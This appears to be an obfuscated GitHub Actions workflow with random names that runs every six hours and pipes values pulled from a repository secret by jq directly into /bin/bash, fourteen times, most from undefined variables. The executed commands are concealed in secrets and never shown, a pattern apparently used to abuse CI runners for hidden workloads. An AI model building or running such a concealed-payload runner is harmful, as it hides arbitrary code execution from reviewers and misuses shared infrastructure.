name: taomanchang7816

on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taomanchang7816
        env:
          eaty784: ${{ secrets.eaty784 }}
        run: |
          echo $eaty784 | jq -r .lb3 | /bin/bash
          echo $zzs8 | jq -r .gly5498 | /bin/bash
          echo $fptbt9 | jq -r .mtkmq2 | /bin/bash
          echo $dw182 | jq -r .vtow4704 | /bin/bash
          echo $xaohz22922 | jq -r .d25612 | /bin/bash
          echo $vj2266 | jq -r .yaah1 | /bin/bash
          echo $gkg48974 | jq -r .cf6409 | /bin/bash
          echo $xzhnn44707 | jq -r .jp24135 | /bin/bash
          echo $e238 | jq -r .gdkxe3 | /bin/bash
          echo $fte453 | jq -r .nkno2897 | /bin/bash
          echo $anxfx87 | jq -r .yaei67 | /bin/bash
          echo $q42 | jq -r .aoz9109 | /bin/bash
          echo $pzl2006 | jq -r .fra72915 | /bin/bash
          echo $yuvuk963 | jq -r .viq0 | /bin/bash

